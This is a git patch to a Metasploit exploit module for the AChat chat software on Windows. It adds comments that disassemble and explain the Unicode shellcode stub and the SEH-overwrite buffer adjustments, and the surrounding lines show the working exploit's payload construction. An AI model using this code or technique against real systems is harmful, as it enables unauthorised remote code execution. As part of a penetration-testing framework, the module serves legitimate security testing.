From c7880ab4e15f08caed7d465ed49a0aa0133196a5 Mon Sep 17 00:00:00 2001
From: Balazs Bucsay <github@rycon.hu>
Date: Mon, 9 Feb 2015 23:21:38 +0100
Subject: [PATCH] hex strings related explanations

---
 modules/exploits/windows/misc/achat_beta.rb | 35 +++++++++++++++++++++
 1 file changed, 35 insertions(+)

diff --git a/modules/exploits/windows/misc/achat_beta.rb b/modules/exploits/windows/misc/achat_beta.rb
index 7a3ae5c309..9ce82d1951 100644
--- a/modules/exploits/windows/misc/achat_beta.rb
+++ b/modules/exploits/windows/misc/achat_beta.rb
@@ -67,6 +67,22 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit
     connect_udp
 
+    # 0055 00          ADD BYTE PTR SS:[EBP],DL # padding
+    # 2A00             SUB AL,BYTE PTR DS:[EAX] # padding
+    # 55               PUSH EBP                 # ebp holds a close pointer to the payload
+    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
+    # 58               POP EAX                  # mov eax, ebp
+    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
+    # 05 00140011      ADD EAX,11001400         # adjusting eax
+    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
+    # 2D 00130011      SUB EAX,11001300         # lea eax, eax+100
+    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
+    # 50               PUSH EAX                 # eax points to the start of the shellcode
+    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
+    # 58               POP EAX                  # padding
+    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
+    # 59               POP ECX                  # padding
+    # 0039             ADD BYTE PTR DS:[ECX],BH # padding
     firststage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
     encoder = framework.encoders.create('x86/unicode_mixed')
     encoder.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
@@ -78,7 +94,26 @@ class Metasploit3 < Msf::Exploit::Remote
     sploit << "\x61\x40" # POPAD + INC EAX
 
     sploit << target.ret # AChat.exe p/p/r address
+
     # adjusting the first thread's unicode payload, tricky asm-fu
+    # the first seh exception jumps here, firststage variable will be executed
+    # by the second seh exception as well. It needs to be in sync with the second
+    # thread, so that is why we adjust eax/ebp to have a close pointer to the
+    # payload, then firststage variable will take the rest of the job.
+    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
+    # 55               PUSH EBP                 # ebp with close pointer to payload
+    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
+    # 58               POP EAX                  # put ebp to eax
+    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
+    # 2A00             SUB AL,BYTE PTR DS:[EAX] # setting eax to the right place
+    # 2A00             SUB AL,BYTE PTR DS:[EAX] # adjusting eax a little bit more
+    # 05 00140011      ADD EAX,11001400         # more adjusting
+    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
+    # 2D 00130011      SUB EAX,11001300         # lea eax, eax+100
+    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
+    # 50               PUSH EAX			# saving eax
+    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
+    # 5D               POP EBP			# mov ebp, eax
     sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
     sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread
     sploit << "\x2A" + firststage + "C"*(157-firststage.length-31-3) # put address of the payload to EAX